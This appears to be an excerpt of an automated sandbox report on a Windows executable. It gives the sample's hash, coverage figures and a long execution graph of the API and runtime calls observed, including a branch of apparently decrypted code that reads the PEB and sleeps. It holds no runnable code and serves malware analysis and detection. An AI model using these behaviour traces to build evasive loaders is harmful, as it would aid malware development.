                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:3.6%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:8.8%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:35
                            execution_graph 84226 4010e0 84229 401100 84226->84229 84228 4010f8 84230 401113 84229->84230 84232 401120 84230->84232 84233 401184 84230->84233 84234 40114c 84230->84234 84259 401182 84230->84259 84231 40112c DefWindowProcW 84231->84228 84232->84231 84288 401000 Shell_NotifyIconW setSBUpLow 84232->84288 84267 401250 84233->84267 84236 401151 84234->84236 84237 40119d 84234->84237 84241 401219 84236->84241 84242 40115d 84236->84242 84239 4011a3 84237->84239 84240 42afb4 84237->84240 84238 401193 84238->84228 84239->84232 84251 4011b6 KillTimer 84239->84251 84252 4011db SetTimer RegisterWindowMessageW 84239->84252 84283 40f190 10 API calls 84240->84283 84241->84232 84243 401225 84241->84243 84246 401163 84242->84246 84247 42b01d 84242->84247 84299 468b0e 74 API calls setSBUpLow 84243->84299 84248 42afe9 84246->84248 84249 40116c 84246->84249 84247->84231 84287 4370f4 52 API calls 84247->84287 84285 40f190 10 API calls 84248->84285 84249->84232 84260 401174 84249->84260 84250 42b04f 84289 40e0c0 84250->84289 84282 401000 Shell_NotifyIconW setSBUpLow 84251->84282 84252->84238 84257 401204 CreatePopupMenu 84252->84257 84257->84228 84259->84231 84284 45fd57 65 API calls setSBUpLow 84260->84284 84261 42afe4 84261->84238 84262 42b00e 84286 401a50 331 API calls 84262->84286 84263 4011c9 PostQuitMessage 84263->84228 84266 42afdc 84266->84231 84266->84261 84268 401262 setSBUpLow 84267->84268 84269 4012e8 84267->84269 84300 401b80 84268->84300 84269->84238 84271 40128c 84272 4012d1 KillTimer SetTimer 84271->84272 84273 4012bb 84271->84273 84274 4272ec 84271->84274 84272->84269 84275 4012c5 84273->84275 84276 42733f 84273->84276 84277 4272f4 Shell_NotifyIconW 84274->84277 84278 42731a Shell_NotifyIconW 84274->84278 84275->84272 84281 427393 Shell_NotifyIconW 84275->84281 84279 427348 Shell_NotifyIconW 84276->84279 84280 42736e Shell_NotifyIconW 84276->84280 84277->84272 84278->84272 84279->84272 84280->84272 84281->84272 84282->84263 84283->84238 84284->84266 84285->84262 84286->84259 84287->84259 84288->84250 84291 40e0e7 setSBUpLow 84289->84291 84290 40e142 84292 40e184 84290->84292 84398 4341e6 63 API calls __wcsicoll 84290->84398 84291->84290 84293 42729f DestroyIcon 84291->84293 84295 40e1a0 Shell_NotifyIconW 84292->84295 84296 4272db Shell_NotifyIconW 84292->84296 84293->84290 84297 401b80 54 API calls 84295->84297 84298 40e1ba 84297->84298 84298->84259 84299->84261 84301 401b9c 84300->84301 84321 401c7e 84300->84321 84322 4013c0 84301->84322 84304 42722b LoadStringW 84307 427246 84304->84307 84305 401bb9 84327 402160 84305->84327 84341 40e0a0 84307->84341 84308 401bcd 84310 427258 84308->84310 84311 401bda 84308->84311 84345 40d200 52 API calls 2 library calls 84310->84345 84311->84307 84312 401be4 84311->84312 84340 40d200 52 API calls 2 library calls 84312->84340 84315 427267 84316 42727b 84315->84316 84318 401bf3 setSBUpLow _wcscpy _wcsncpy 84315->84318 84346 40d200 52 API calls 2 library calls 84316->84346 84320 401c62 Shell_NotifyIconW 84318->84320 84319 427289 84320->84321 84321->84271 84347 4115d7 84322->84347 84328 426daa 84327->84328 84329 40216b _wcslen 84327->84329 84385 40c600 84328->84385 84332 402180 84329->84332 84333 40219e 84329->84333 84331 426db5 84331->84308 84384 403bd0 52 API calls ctype 84332->84384 84335 4013a0 52 API calls 84333->84335 84337 4021a5 84335->84337 84336 402187 _memmove 84336->84308 84338 426db7 84337->84338 84339 4115d7 52 API calls 84337->84339 84339->84336 84340->84318 84342 40e0b2 84341->84342 84343 40e0a8 84341->84343 84342->84318 84397 403c30 52 API calls _memmove 84343->84397 84345->84315 84346->84319 84349 4115e1 _malloc 84347->84349 84350 4013e4 84349->84350 84354 4115fd std::exception::exception 84349->84354 84361 4135bb 84349->84361 84358 4013a0 84350->84358 84351 41163b 84376 4180af 46 API calls std::exception::operator= 84351->84376 84353 411645 84377 418105 RaiseException 84353->84377 84354->84351 84375 41130a 51 API calls __cinit 84354->84375 84357 411656 84359 4115d7 52 API calls 84358->84359 84360 4013a7 84359->84360 84360->84304 84360->84305 84362 413638 _malloc 84361->84362 84363 4135c9 _malloc 84361->84363 84383 417f77 46 API calls __getptd_noexit 84362->84383 84366 4135f7 RtlAllocateHeap 84363->84366 84368 4135d4 84363->84368 84370 413624 84363->84370 84373 413622 84363->84373 84366->84363 84367 413630 84366->84367 84367->84349 84368->84363 84378 418901 46 API calls __NMSG_WRITE 84368->84378 84379 418752 46 API calls 5 library calls 84368->84379 84380 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84368->84380 84381 417f77 46 API calls __getptd_noexit 84370->84381 84382 417f77 46 API calls __getptd_noexit 84373->84382 84375->84351 84376->84353 84377->84357 84378->84368 84379->84368 84381->84373 84382->84367 84383->84367 84384->84336 84386 40c619 84385->84386 84387 40c60a 84385->84387 84386->84331 84387->84386 84390 4026f0 84387->84390 84389 426d7a _memmove 84389->84331 84391 426873 84390->84391 84392 4026ff 84390->84392 84393 4013a0 52 API calls 84391->84393 84392->84389 84394 42687b 84393->84394 84395 4115d7 52 API calls 84394->84395 84396 42689e _memmove 84395->84396 84396->84389 84397->84342 84398->84292 84399 40bd20 84403 428194 84399->84403 84408 40bd2d 84399->84408 84400 40bd43 84402 4281bc 84421 45e987 86 API calls ctype 84402->84421 84403->84400 84403->84402 84404 4281b2 84403->84404 84420 40b510 VariantClear 84404->84420 84409 40bd37 84408->84409 84422 4531b1 85 API calls 5 library calls 84408->84422 84411 40bd50 84409->84411 84410 4281ba 84412 426cf1 84411->84412 84413 40bd63 84411->84413 84432 44cde9 52 API calls _memmove 84412->84432 84423 40bd80 84413->84423 84416 40bd73 84416->84400 84417 426cfc 84418 40e0a0 52 API calls 84417->84418 84419 426d02 84418->84419 84420->84410 84421->84408 84422->84409 84424 40bd8e 84423->84424 84425 40bdb7 _memmove 84423->84425 84424->84425 84426 40bded 84424->84426 84427 40bdad 84424->84427 84425->84416 84428 4115d7 52 API calls 84426->84428 84433 402f00 84427->84433 84430 40bdf6 84428->84430 84430->84425 84431 4115d7 52 API calls 84430->84431 84431->84425 84432->84417 84434 402f10 84433->84434 84435 402f0c 84433->84435 84436 4268c3 84434->84436 84437 4115d7 52 API calls 84434->84437 84435->84425 84438 402f51 ctype _memmove 84437->84438 84438->84425 84439 425ba2 84444 40e360 84439->84444 84441 425bb4 84460 41130a 51 API calls __cinit 84441->84460 84443 425bbe 84445 4115d7 52 API calls 84444->84445 84446 40e3ec GetModuleFileNameW 84445->84446 84461 413a0e 84446->84461 84448 40e421 _wcsncat 84464 413a9e 84448->84464 84451 4115d7 52 API calls 84452 40e45e _wcscpy 84451->84452 84467 40bc70 84452->84467 84456 40e4a9 84456->84441 84457 4115d7 52 API calls 84458 40e4a1 _wcscat _wcslen _wcsncpy 84457->84458 84458->84456 84458->84457 84459 401c90 52 API calls 84458->84459 84459->84458 84460->84443 84486 413801 84461->84486 84516 419efd 84464->84516 84468 4115d7 52 API calls 84467->84468 84469 40bc98 84468->84469 84470 4115d7 52 API calls 84469->84470 84471 40bca6 84470->84471 84472 40e4c0 84471->84472 84528 403350 84472->84528 84474 40e4cb RegOpenKeyExW 84475 427190 RegQueryValueExW 84474->84475 84476 40e4eb 84474->84476 84477 4271b0 84475->84477 84478 42721a RegCloseKey 84475->84478 84476->84458 84479 4115d7 52 API calls 84477->84479 84478->84458 84480 4271cb 84479->84480 84535 43652f 52 API calls 84480->84535 84482 4271d8 RegQueryValueExW 84483 4271f7 84482->84483 84485 42720e 84482->84485 84484 402160 52 API calls 84483->84484 84484->84485 84485->84478 84488 41389e 84486->84488 84494 41381a 84486->84494 84487 4139e8 84513 417f77 46 API calls __getptd_noexit 84487->84513 84488->84487 84490 413a00 84488->84490 84515 417f77 46 API calls __getptd_noexit 84490->84515 84491 4139ed 84514 417f25 10 API calls __mbschr_l 84491->84514 84494->84488 84500 41388a 84494->84500 84508 419e30 46 API calls __mbschr_l 84494->84508 84496 41396c 84496->84488 84498 413967 84496->84498 84501 41397a 84496->84501 84497 413929 84497->84488 84499 413945 84497->84499 84510 419e30 46 API calls __mbschr_l 84497->84510 84498->84448 84499->84488 84499->84498 84504 41395b 84499->84504 84500->84488 84507 413909 84500->84507 84509 419e30 46 API calls __mbschr_l 84500->84509 84512 419e30 46 API calls __mbschr_l 84501->84512 84511 419e30 46 API calls __mbschr_l 84504->84511 84507->84496 84507->84497 84508->84500 84509->84507 84510->84499 84511->84498 84512->84498 84513->84491 84514->84498 84515->84498 84517 419f13 84516->84517 84518 419f0e 84516->84518 84525 417f77 46 API calls __getptd_noexit 84517->84525 84518->84517 84521 419f2b 84518->84521 84520 419f18 84526 417f25 10 API calls __mbschr_l 84520->84526 84524 40e454 84521->84524 84527 417f77 46 API calls __getptd_noexit 84521->84527 84524->84451 84525->84520 84526->84524 84527->84520 84529 403367 84528->84529 84530 403358 84528->84530 84531 4115d7 52 API calls 84529->84531 84530->84474 84532 403370 84531->84532 84533 4115d7 52 API calls 84532->84533 84534 40339e 84533->84534 84534->84474 84535->84482 84536 3f27c30 84553 3f25830 84536->84553 84538 3f27d27 84556 3f27b20 84538->84556 84559 3f28d70 GetPEB 84553->84559 84555 3f25ebb 84555->84538 84557 3f27b29 Sleep 84556->84557 84558 3f27b37 84557->84558 84560 3f28d9a 84559->84560 84560->84555 84561 416454 84598 416c70 84561->84598 84563 416460 GetStartupInfoW 84564 416474 84563->84564 84599 419d5a HeapCreate 84564->84599 84566 4164cd 84567 4164d8 84566->84567 84683 41642b 46 API calls 3 library calls 84566->84683 84600 417c20 GetModuleHandleW 84567->84600 84570 4164de 84571 4164e9 __RTC_Initialize 84570->84571 84684 41642b 46 API calls 3 library calls 84570->84684 84619 41aaa1 GetStartupInfoW 84571->84619 84575 416503 GetCommandLineW 84632 41f584 GetEnvironmentStringsW 84575->84632 84579 416513 84638 41f4d6 GetModuleFileNameW 84579->84638 84581 41651d 84582 416528 84581->84582 84686 411924 46 API calls 3 library calls 84581->84686 84642 41f2a4 84582->84642 84585 41652e 84586 416539 84585->84586 84687 411924 46 API calls 3 library calls 84585->84687 84656 411703 84586->84656 84589 416541 84591 41654c __wwincmdln 84589->84591 84688 411924 46 API calls 3 library calls 84589->84688 84660 40d6b0 84591->84660 84594 41657c 84690 411906 46 API calls _doexit 84594->84690 84597 416581 __wsopen_helper 84598->84563 84599->84566 84601 417c34 84600->84601 84602 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84600->84602 84691 4178ff 49 API calls _free 84601->84691 84604 417c87 TlsAlloc 84602->84604 84607 417cd5 TlsSetValue 84604->84607 84608 417d96 84604->84608 84605 417c39 84605->84570 84607->84608 84609 417ce6 __init_pointers 84607->84609 84608->84570 84692 418151 InitializeCriticalSectionAndSpinCount 84609->84692 84611 417d91 84700 4178ff 49 API calls _free 84611->84700 84613 417d2a 84613->84611 84693 416b49 84613->84693 84616 417d76 84699 41793c 46 API calls 4 library calls 84616->84699 84618 417d7e GetCurrentThreadId 84618->84608 84620 416b49 __calloc_crt 46 API calls 84619->84620 84630 41aabf 84620->84630 84621 41ac6a GetStdHandle 84627 41ac34 84621->84627 84622 41acce SetHandleCount 84624 4164f7 84622->84624 84623 416b49 __calloc_crt 46 API calls 84623->84630 84624->84575 84685 411924 46 API calls 3 library calls 84624->84685 84625 41ac7c GetFileType 84625->84627 84626 41abb4 84626->84627 84628 41abe0 GetFileType 84626->84628 84629 41abeb InitializeCriticalSectionAndSpinCount 84626->84629 84627->84621 84627->84622 84627->84625 84631 41aca2 InitializeCriticalSectionAndSpinCount 84627->84631 84628->84626 84628->84629 84629->84624 84629->84626 84630->84623 84630->84624 84630->84626 84630->84627 84630->84630 84631->84624 84631->84627 84633 41f595 84632->84633 84634 41f599 84632->84634 84633->84579 84710 416b04 84634->84710 84636 41f5bb _memmove 84637 41f5c2 FreeEnvironmentStringsW 84636->84637 84637->84579 84639 41f50b _wparse_cmdline 84638->84639 84640 416b04 __malloc_crt 46 API calls 84639->84640 84641 41f54e _wparse_cmdline 84639->84641 84640->84641 84641->84581 84643 41f2bc _wcslen 84642->84643 84647 41f2b4 84642->84647 84644 416b49 __calloc_crt 46 API calls 84643->84644 84649 41f2e0 _wcslen 84644->84649 84645 41f336 84717 413748 84645->84717 84647->84585 84648 416b49 __calloc_crt 46 API calls 84648->84649 84649->84645 84649->84647 84649->84648 84650 41f35c 84649->84650 84653 41f373 84649->84653 84716 41ef12 46 API calls __mbschr_l 84649->84716 84651 413748 _free 46 API calls 84650->84651 84651->84647 84723 417ed3 84653->84723 84655 41f37f 84655->84585 84657 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84656->84657 84659 411750 __IsNonwritableInCurrentImage 84657->84659 84742 41130a 51 API calls __cinit 84657->84742 84659->84589 84661 42e2f3 84660->84661 84662 40d6cc 84660->84662 84743 408f40 84662->84743 84664 40d707 84747 40ebb0 84664->84747 84667 40d737 84750 411951 84667->84750 84672 40d751 84762 40f4e0 SystemParametersInfoW SystemParametersInfoW 84672->84762 84674 40d75f 84763 40d590 GetCurrentDirectoryW 84674->84763 84676 40d767 SystemParametersInfoW 84677 40d794 84676->84677 84678 40d78d FreeLibrary 84676->84678 84679 408f40 VariantClear 84677->84679 84678->84677 84680 40d79d 84679->84680 84681 408f40 VariantClear 84680->84681 84682 40d7a6 84681->84682 84682->84594 84689 4118da 46 API calls _doexit 84682->84689 84683->84567 84684->84571 84689->84594 84690->84597 84691->84605 84692->84613 84695 416b52 84693->84695 84696 416b8f 84695->84696 84697 416b70 Sleep 84695->84697 84701 41f677 84695->84701 84696->84611 84696->84616 84698 416b85 84697->84698 84698->84695 84698->84696 84699->84618 84700->84608 84702 41f683 84701->84702 84706 41f69e _malloc 84701->84706 84703 41f68f 84702->84703 84702->84706 84709 417f77 46 API calls __getptd_noexit 84703->84709 84705 41f6b1 HeapAlloc 84705->84706 84707 41f6d8 84705->84707 84706->84705 84706->84707 84707->84695 84708 41f694 84708->84695 84709->84708 84712 416b0d 84710->84712 84711 4135bb _malloc 45 API calls 84711->84712 84712->84711 84713 416b43 84712->84713 84714 416b24 Sleep 84712->84714 84713->84636 84715 416b39 84714->84715 84715->84712 84715->84713 84716->84649 84718 413753 RtlFreeHeap 84717->84718 84722 41377c _free 84717->84722 84719 413768 84718->84719 84718->84722 84726 417f77 46 API calls __getptd_noexit 84719->84726 84721 41376e GetLastError 84721->84722 84722->84647 84727 417daa 84723->84727 84726->84721 84728 417dc9 setSBUpLow __call_reportfault 84727->84728 84729 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84728->84729 84732 417eb5 __call_reportfault 84729->84732 84731 417ed1 GetCurrentProcess TerminateProcess 84731->84655 84733 41a208 84732->84733 84734 41a210 84733->84734 84735 41a212 IsDebuggerPresent 84733->84735 84734->84731 84741 41fe19 84735->84741 84738 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84739 421ff0 __call_reportfault 84738->84739 84740 421ff8 GetCurrentProcess TerminateProcess 84738->84740 84739->84740 84740->84731 84741->84738 84742->84659 84744 408f48 ctype 84743->84744 84745 4265c7 VariantClear 84744->84745 84746 408f55 ctype 84744->84746 84745->84746 84746->84664 84803 40ebd0 84747->84803 84807 4182cb 84750->84807 84752 41195e 84814 4181f2 LeaveCriticalSection 84752->84814 84754 40d748 84755 4119b0 84754->84755 84756 4119d6 84755->84756 84757 4119bc 84755->84757 84756->84672 84757->84756 84849 417f77 46 API calls __getptd_noexit 84757->84849 84759 4119c6 84850 417f25 10 API calls __mbschr_l 84759->84850 84761 4119d1 84761->84672 84762->84674 84851 401f20 84763->84851 84765 40d5b6 IsDebuggerPresent 84766 40d5c4 84765->84766 84767 42e1bb MessageBoxA 84765->84767 84768 42e1d4 84766->84768 84769 40d5e3 84766->84769 84767->84768 85023 403a50 52 API calls 3 library calls 84768->85023 84921 40f520 84769->84921 84773 40d5fd GetFullPathNameW 84933 401460 84773->84933 84775 40d63b 84776 40d643 84775->84776 84777 42e231 SetCurrentDirectoryW 84775->84777 84778 40d64c 84776->84778 85024 432fee 6 API calls 84776->85024 84777->84776 84948 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84778->84948 84781 42e252 84781->84778 84783 42e25a GetModuleFileNameW 84781->84783 84785 42e274 84783->84785 84786 42e2cb GetForegroundWindow ShellExecuteW 84783->84786 85025 401b10 84785->85025 84792 40d688 84786->84792 84787 40d656 84788 40d669 84787->84788 84790 40e0c0 74 API calls 84787->84790 84956 4091e0 84788->84956 84790->84788 84795 40d692 SetCurrentDirectoryW 84792->84795 84795->84676 84797 42e28d 85032 40d200 52 API calls 2 library calls 84797->85032 84800 42e299 GetForegroundWindow ShellExecuteW 84801 42e2c6 84800->84801 84801->84792 84802 40ec00 LoadLibraryA GetProcAddress 84802->84667 84804 40d72e 84803->84804 84805 40ebd6 LoadLibraryA 84803->84805 84804->84667 84804->84802 84805->84804 84806 40ebe7 GetProcAddress 84805->84806 84806->84804 84808 4182e0 84807->84808 84809 4182f3 EnterCriticalSection 84807->84809 84815 418209 84808->84815 84809->84752 84811 4182e6 84811->84809 84842 411924 46 API calls 3 library calls 84811->84842 84814->84754 84816 418215 __wsopen_helper 84815->84816 84817 418225 84816->84817 84818 41823d 84816->84818 84843 418901 46 API calls __NMSG_WRITE 84817->84843 84820 416b04 __malloc_crt 45 API calls 84818->84820 84826 41824b __wsopen_helper 84818->84826 84822 418256 84820->84822 84821 41822a 84844 418752 46 API calls 5 library calls 84821->84844 84824 41825d 84822->84824 84825 41826c 84822->84825 84846 417f77 46 API calls __getptd_noexit 84824->84846 84829 4182cb __lock 45 API calls 84825->84829 84826->84811 84827 418231 84845 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84827->84845 84831 418273 84829->84831 84833 4182a6 84831->84833 84834 41827b InitializeCriticalSectionAndSpinCount 84831->84834 84835 413748 _free 45 API calls 84833->84835 84836 41828b 84834->84836 84841 418297 84834->84841 84835->84841 84837 413748 _free 45 API calls 84836->84837 84839 418291 84837->84839 84847 417f77 46 API calls __getptd_noexit 84839->84847 84848 4182c2 LeaveCriticalSection _doexit 84841->84848 84843->84821 84844->84827 84846->84826 84847->84841 84848->84826 84849->84759 84850->84761 85033 40e6e0 84851->85033 84855 401f41 GetModuleFileNameW 85051 410100 84855->85051 84857 401f5c 85063 410960 84857->85063 84860 401b10 52 API calls 84861 401f81 84860->84861 85066 401980 84861->85066 84863 401f8e 84864 408f40 VariantClear 84863->84864 84865 401f9d 84864->84865 84866 401b10 52 API calls 84865->84866 84867 401fb4 84866->84867 84868 401980 53 API calls 84867->84868 84869 401fc3 84868->84869 84870 401b10 52 API calls 84869->84870 84871 401fd2 84870->84871 85074 40c2c0 84871->85074 84873 401fe1 84874 40bc70 52 API calls 84873->84874 84875 401ff3 84874->84875 85092 401a10 84875->85092 84877 401ffe 85099 4114ab 84877->85099 84880 428b05 84882 401a10 52 API calls 84880->84882 84881 402017 84883 4114ab __wcsicoll 58 API calls 84881->84883 84884 428b18 84882->84884 84885 402022 84883->84885 84887 401a10 52 API calls 84884->84887 84885->84884 84886 40202d 84885->84886 84888 4114ab __wcsicoll 58 API calls 84886->84888 84889 428b33 84887->84889 84890 402038 84888->84890 84892 428b3b GetModuleFileNameW 84889->84892 84891 402043 84890->84891 84890->84892 84893 4114ab __wcsicoll 58 API calls 84891->84893 84894 401a10 52 API calls 84892->84894 84896 40204e 84893->84896 84895 428b6c 84894->84895 84898 40e0a0 52 API calls 84895->84898 84897 402092 84896->84897 84901 401a10 52 API calls 84896->84901 84906 428b90 _wcscpy 84896->84906 84900 4020a3 84897->84900 84897->84906 84899 428b7a 84898->84899 84902 401a10 52 API calls 84899->84902 84903 428bc6 84900->84903 85107 40e830 53 API calls 84900->85107 84904 402073 _wcscpy 84901->84904 84905 428b88 84902->84905 84912 401a10 52 API calls 84904->84912 84905->84906 84908 401a10 52 API calls 84906->84908 84910 4020d0 84908->84910 84909 4020bb 85108 40cf00 53 API calls 84909->85108 84915 402110 84910->84915 84919 401a10 52 API calls 84910->84919 85109 40cf00 53 API calls 84910->85109 85110 40e6a0 53 API calls 84910->85110 84912->84897 84913 4020c6 84914 408f40 VariantClear 84913->84914 84914->84910 84918 408f40 VariantClear 84915->84918 84920 402120 ctype 84918->84920 84919->84910 84920->84765 84922 4295c9 setSBUpLow 84921->84922 84923 40f53c 84921->84923 84925 4295d9 GetOpenFileNameW 84922->84925 85786 410120 84923->85786 84925->84923 84927 40d5f5 84925->84927 84926 40f545 85790 4102b0 SHGetMalloc 84926->85790 84927->84773 84927->84775 84929 40f54c 85795 410190 GetFullPathNameW 84929->85795 84931 40f559 85806 40f570 84931->85806 85862 402400 84933->85862 84935 40146f 84938 428c29 _wcscat 84935->84938 85871 401500 84935->85871 84937 40147c 84937->84938 85879 40d440 84937->85879 84940 401489 84940->84938 84941 401491 GetFullPathNameW 84940->84941 84942 402160 52 API calls 84941->84942 84943 4014bb 84942->84943 84944 402160 52 API calls 84943->84944 84945 4014c8 84944->84945 84945->84938 84946 402160 52 API calls 84945->84946 84947 4014ee 84946->84947 84947->84775 84949 428361 84948->84949 84950 4103fc LoadImageW RegisterClassExW 84948->84950 85899 44395e EnumResourceNamesW LoadImageW 84949->85899 85898 410490 7 API calls 84950->85898 84953 40d651 84955 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84953->84955 84954 428368 84955->84787 84957 409202 84956->84957 84958 42d7ad 84956->84958 85016 409216 ctype 84957->85016 86171 410940 331 API calls 84957->86171 86174 45e737 90 API calls 3 library calls 84958->86174 84961 409386 84962 40939c 84961->84962 86172 40f190 10 API calls 84961->86172 84962->84792 85022 401000 Shell_NotifyIconW setSBUpLow 84962->85022 84964 4095b2 84964->84962 84966 4095bf 84964->84966 84965 409253 PeekMessageW 84965->85016 86173 401a50 331 API calls 84966->86173 84968 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84968->84962 84970 4095f9 84968->84970 84969 42d8cd Sleep 84969->85016 84974 42e158 TranslateMessage DispatchMessageW GetMessageW 84970->84974 84972 42e13b 86192 40d410 VariantClear 84972->86192 84974->84974 84977 42e188 84974->84977 84976 409567 PeekMessageW 84976->85016 84977->84962 84980 44c29d 52 API calls 85011 4094e0 84980->85011 84981 46f3c1 107 API calls 84981->85016 84982 40e0a0 52 API calls 84982->85016 84983 46fdbf 108 API calls 84983->85011 84984 409551 TranslateMessage DispatchMessageW 84984->84976 84986 42dcd2 WaitForSingleObject 84988 42dcf0 GetExitCodeProcess CloseHandle 84986->84988 84986->85016 84987 42dd3d Sleep 84987->85011 86181 40d410 VariantClear 84988->86181 84992 4094cf Sleep 84992->85011 84994 40d410 VariantClear 84994->85016 84996 42d94d timeGetTime 86177 465124 53 API calls 84996->86177 84997 40c620 timeGetTime 84997->85011 85000 42dd89 CloseHandle 85000->85011 85001 47d33e 309 API calls 85001->85016 85003 465124 53 API calls 85003->85011 85004 42de19 GetExitCodeProcess CloseHandle 85004->85011 85006 401b10 52 API calls 85006->85011 85008 42de88 Sleep 85008->85016 85011->84980 85011->84983 85011->84997 85011->85000 85011->85003 85011->85004 85011->85006 85011->85008 85015 408f40 VariantClear 85011->85015 85011->85016 85020 401980 53 API calls 85011->85020 86178 45178a 54 API calls 85011->86178 86179 47d33e 331 API calls 85011->86179 86180 453bc6 54 API calls 85011->86180 86182 40d410 VariantClear 85011->86182 86183 443d19 67 API calls _wcslen 85011->86183 86184 4574b4 VariantClear 85011->86184 86185 403cd0 85011->86185 86189 4731e1 VariantClear 85011->86189 86190 4331a2 6 API calls 85011->86190 85014 45e737 90 API calls 85014->85016 85015->85011 85016->84961 85016->84965 85016->84969 85016->84972 85016->84976 85016->84981 85016->84982 85016->84984 85016->84986 85016->84987 85016->84992 85016->84994 85016->84996 85016->85001 85016->85011 85016->85014 85017 42e0cc VariantClear 85016->85017 85018 408f40 VariantClear 85016->85018 85900 4091b0 85016->85900 85958 40afa0 85016->85958 85984 408fc0 85016->85984 86019 408cc0 85016->86019 86033 40d150 85016->86033 86038 40d170 85016->86038 86044 4096a0 85016->86044 86175 465124 53 API calls 85016->86175 86176 40c620 timeGetTime 85016->86176 86191 40e270 VariantClear ctype 85016->86191 85017->85016 85018->85016 85020->85011 85022->84792 85023->84775 85024->84781 85026 401b16 _wcslen 85025->85026 85027 4115d7 52 API calls 85026->85027 85030 401b63 85026->85030 85028 401b4b _memmove 85027->85028 85029 4115d7 52 API calls 85028->85029 85029->85030 85031 40d200 52 API calls 2 library calls 85030->85031 85031->84797 85032->84800 85034 40bc70 52 API calls 85033->85034 85035 401f31 85034->85035 85036 402560 85035->85036 85037 40256d __write_nolock 85036->85037 85038 402160 52 API calls 85037->85038 85040 402593 85038->85040 85050 4025bd 85040->85050 85111 401c90 85040->85111 85041 4026f0 52 API calls 85041->85050 85042 4026a7 85043 401b10 52 API calls 85042->85043 85049 4026db 85042->85049 85045 4026d1 85043->85045 85044 401b10 52 API calls 85044->85050 85115 40d7c0 52 API calls 2 library calls 85045->85115 85046 401c90 52 API calls 85046->85050 85049->84855 85050->85041 85050->85042 85050->85044 85050->85046 85114 40d7c0 52 API calls 2 library calls 85050->85114 85116 40f760 85051->85116 85054 410118 85054->84857 85056 42805d 85060 42806a 85056->85060 85172 431e58 85056->85172 85057 413748 _free 46 API calls 85059 428078 85057->85059 85061 431e58 82 API calls 85059->85061 85060->85057 85062 428084 85061->85062 85062->84857 85064 4115d7 52 API calls 85063->85064 85065 401f74 85064->85065 85065->84860 85067 4019a3 85066->85067 85069 401985 85066->85069 85068 4019b8 85067->85068 85067->85069 85775 403e10 53 API calls 85068->85775 85071 40199f 85069->85071 85774 403e10 53 API calls 85069->85774 85071->84863 85072 4019c4 85072->84863 85075 40c2c7 85074->85075 85076 40c30e 85074->85076 85079 40c2d3 85075->85079 85080 426c79 85075->85080 85077 40c315 85076->85077 85078 426c2b 85076->85078 85081 40c321 85077->85081 85082 426c5a 85077->85082 85084 426c4b 85078->85084 85085 426c2e 85078->85085 85776 403ea0 52 API calls __cinit 85079->85776 85781 4534e3 52 API calls 85080->85781 85777 403ea0 52 API calls __cinit 85081->85777 85780 4534e3 52 API calls 85082->85780 85779 4534e3 52 API calls 85084->85779 85091 40c2de 85085->85091 85778 4534e3 52 API calls 85085->85778 85091->84873 85091->85091 85093 401a30 85092->85093 85094 401a17 85092->85094 85096 402160 52 API calls 85093->85096 85095 401a2d 85094->85095 85782 403c30 52 API calls _memmove 85094->85782 85095->84877 85098 401a3d 85096->85098 85098->84877 85100 411523 85099->85100 85101 4114ba 85099->85101 85785 4113a8 58 API calls 3 library calls 85100->85785 85106 40200c 85101->85106 85783 417f77 46 API calls __getptd_noexit 85101->85783 85104 4114c6 85784 417f25 10 API calls __mbschr_l 85104->85784 85106->84880 85106->84881 85107->84909 85108->84913 85109->84910 85110->84910 85112 4026f0 52 API calls 85111->85112 85113 401c97 85112->85113 85113->85040 85114->85050 85115->85049 85176 40f6f0 85116->85176 85118 40f77b _strcat ctype 85184 40f850 85118->85184 85123 427c2a 85213 414d04 85123->85213 85125 40f7fc 85125->85123 85126 40f804 85125->85126 85200 414a46 85126->85200 85130 40f80e 85130->85054 85135 4528bd 85130->85135 85132 427c59 85219 414fe2 85132->85219 85134 427c79 85136 4150d1 _fseek 81 API calls 85135->85136 85137 452930 85136->85137 85716 452719 85137->85716 85140 452948 85140->85056 85141 414d04 __fread_nolock 61 API calls 85142 452966 85141->85142 85143 414d04 __fread_nolock 61 API calls 85142->85143 85144 452976 85143->85144 85145 414d04 __fread_nolock 61 API calls 85144->85145 85146 45298f 85145->85146 85147 414d04 __fread_nolock 61 API calls 85146->85147 85148 4529aa 85147->85148 85149 4150d1 _fseek 81 API calls 85148->85149 85150 4529c4 85149->85150 85151 4135bb _malloc 46 API calls 85150->85151 85152 4529cf 85151->85152 85153 4135bb _malloc 46 API calls 85152->85153 85154 4529db 85153->85154 85155 414d04 __fread_nolock 61 API calls 85154->85155 85156 4529ec 85155->85156 85157 44afef GetSystemTimeAsFileTime 85156->85157 85158 452a00 85157->85158 85159 452a36 85158->85159 85160 452a13 85158->85160 85162 452aa5 85159->85162 85163 452a3c 85159->85163 85161 413748 _free 46 API calls 85160->85161 85166 452a1c 85161->85166 85165 413748 _free 46 API calls 85162->85165 85722 44b1a9 85163->85722 85168 452aa3 85165->85168 85169 413748 _free 46 API calls 85166->85169 85167 452a9d 85170 413748 _free 46 API calls 85167->85170 85168->85056 85171 452a25 85169->85171 85170->85168 85171->85056 85173 431e64 85172->85173 85174 431e6a 85172->85174 85175 414a46 __fcloseall 82 API calls 85173->85175 85174->85060 85175->85174 85177 425de2 85176->85177 85178 40f6fc _wcslen 85176->85178 85177->85118 85179 40f710 WideCharToMultiByte 85178->85179 85180 40f756 85179->85180 85181 40f728 85179->85181 85180->85118 85182 4115d7 52 API calls 85181->85182 85183 40f735 WideCharToMultiByte 85182->85183 85183->85118 85185 40f85d setSBUpLow _strlen 85184->85185 85187 40f7ab 85185->85187 85232 414db8 85185->85232 85188 4149c2 85187->85188 85244 414904 85188->85244 85190 40f7e9 85190->85123 85191 40f5c0 85190->85191 85196 40f5cd _strcat __write_nolock _memmove 